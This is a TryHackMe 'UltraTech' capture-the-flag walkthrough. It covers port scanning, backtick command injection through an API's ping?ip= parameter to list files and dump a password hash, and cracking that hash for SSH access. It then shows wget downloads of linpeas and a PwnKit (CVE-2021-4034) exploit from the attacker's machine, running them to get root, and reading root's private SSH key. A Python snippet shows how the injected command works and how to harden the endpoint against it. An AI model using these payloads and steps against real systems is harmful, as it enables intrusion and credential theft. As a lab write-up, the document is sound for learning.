TryHackMe: UltraTech

!#Tasks
##Task 1:
!>Deploy the machine
<>: Deploy the machine
> No answer needed
##Task 2:
!>It’s enumeration time!
<>: Which software is using the port 8081?
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.102.70

Ans: N******
<>: Which other non-standard port is used?
Command: sudo nmap -sT -p- -sV -T5 -oN nmap/all_ports 10.10.102.70
Ans: 3****
<>: Which software is using this port?
Ans: A*****
<>: Which GNU/Linux distribution seems to be used?

Ans: U*****
<>: The software using the port 8080 is a REST api, how many of its routes are used by the web application?
Command: gobuster dir -u http://10.10.102.70:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Ans: *
>: Let’s check the sites


>: Scan the port we just found
Command: gobuster dir -u http://10.10.102.70:31331/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

>: Let’s look at the /js path

>: Look at api.js

>: Let’s check how the API we found works

>: After checking and pinging, everything looks great
##Task 3:
!>Let the fun begin
! There is a database lying around, what is its filename?
Url: http://10.10.102.70:8081/ping?ip=`ls`

! What is the first user’s password hash?
http://10.10.102.70:8081/ping?ip=`cat%20u****.**.******`

! What is the password associated with this hash?
Url: https://www.md5online.org/md5-decrypt.html

>: Let’s check the entry with ssh
Command: ssh r00t@10.10.102.70
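
The `ping?ip=` requests in this task return command output because the API passes the `ip` value to a shell, which expands the backticks before `ping` runs. The Python sketch below is an added example, not part of the original writeup or the room's code: `vulnerable_ping_command` is an assumed reconstruction of that pattern, and `safe_ping_argv` is a hardened form that accepts only a literal address and never involves a shell.

```python
import ipaddress
import subprocess


def vulnerable_ping_command(ip: str) -> str:
    """Assumed vulnerable pattern: the parameter is pasted into a shell string
    (run with shell=True), so backticks are expanded by the shell."""
    return f"ping -c 1 {ip}"


def safe_ping_argv(ip: str) -> list:
    """Hardened form: allow only a literal IPv4/IPv6 address and return an
    argv list, so no shell ever parses the value."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        raise ValueError("ip must be a literal IPv4 or IPv6 address")
    # Python 3.9+ accepts IPv6 zone IDs ("fe80::1%eth0"); the part after '%'
    # is free-form text, so reject it instead of forwarding it to ping.
    if getattr(addr, "scope_id", None):
        raise ValueError("IPv6 zone IDs are not accepted")
    return ["ping", "-c", "1", str(addr)]


def is_accepted(ip: str) -> bool:
    """True if the hardened validator would let this value reach ping."""
    try:
        safe_ping_argv(ip)
        return True
    except ValueError:
        return False


def ping(ip: str) -> int:
    """Run ping without a shell and return its exit status."""
    return subprocess.run(safe_ping_argv(ip), shell=False, timeout=5,
                          stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL).returncode


if __name__ == "__main__":
    # Constructed sample inputs: the target address and the value from the URL above.
    for sample in ["10.10.102.70", "`ls`", "127.0.0.1 `ls`", "fe80::1%`ls`"]:
        print(repr(sample), "->", "accepted" if is_accepted(sample) else "rejected")
```

On the server side, a rejected value should produce an HTTP 400 and a log entry, since backticks in an `ip` parameter are a strong signal of probing.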

##Task 4:
!>The root of all evil
! What are the first 9 characters of the root user’s private SSH key?
>: Let’s look for vulnerabilities we can use to escalate privileges
>: We could do it manually, but I will use linpeas.sh, an automated tool
>: You can download the tool here:
https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
>: Let’s start the transfer
>: From our terminal
Command: python3 -m http.server 80
>: From target terminal
Command: wget http://10.8.223.65/linpeas.sh
>: Make it executable and run it
Command: chmod +x linpeas.sh
Command: ./linpeas.sh


>: I decided to use CVE-2021-4034
>: You can download the exploit here
>: Let’s start the transfer
>: From our terminal
Command: python3 -m http.server 80
>: From target terminal
Command: wget http://10.8.223.65/pwnkit.c
>: Compile and run it
Command: gcc pwnkit.c -o exploit
Command: ./exploit

And now we are root

Now let’s go and do the last task
Command: cat /root/.ssh/id_rsa
“If you have any questions or comments, please do not hesitate to write. Have a good day”